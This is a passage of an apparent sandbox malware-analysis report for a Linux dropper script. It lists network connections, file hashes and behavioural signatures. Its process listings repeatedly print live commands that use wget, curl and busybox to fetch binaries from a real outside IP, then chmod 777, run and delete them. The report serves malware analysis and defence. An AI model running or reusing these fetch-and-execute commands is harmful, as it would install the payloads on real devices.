[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.1.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 89.187.167.5:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 02:42
Reported
2024-11-14 02:45
Platform
debian9-armhf-20240611-en
Max time kernel
69s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | N/A |
| N/A | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | N/A |
| N/A | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | N/A |
| N/A | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | N/A |
| N/A | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | N/A |
| N/A | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | N/A |
| N/A | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | N/A |
| N/A | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | N/A |
| N/A | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | N/A |
| N/A | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | N/A |
| N/A | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | N/A |
| N/A | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | N/A |
| N/A | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | N/A |
| N/A | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 | /usr/bin/curl | N/A |
Processes
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/chmod
[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m
[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/bin/rm
[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]
/usr/bin/wget
[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/chmod
[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J
[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/bin/rm
[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]
/usr/bin/wget
[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/chmod
[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O
[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/bin/rm
[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]
/usr/bin/wget
[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/chmod
[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB
[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/bin/rm
[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]
/usr/bin/wget
[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/chmod
[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O
[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/bin/rm
[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]
/usr/bin/wget
[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/chmod
[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz
[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/bin/rm
[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]
/usr/bin/wget
[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/chmod
[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE
[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/bin/rm
[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]
/usr/bin/wget
[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/chmod
[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx
[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/bin/rm
[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]
/usr/bin/wget
[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/chmod
[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4
[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/bin/rm
[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]
/usr/bin/wget
[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/chmod
[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC
[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/bin/rm
[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]
/usr/bin/wget
[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]
/usr/bin/curl
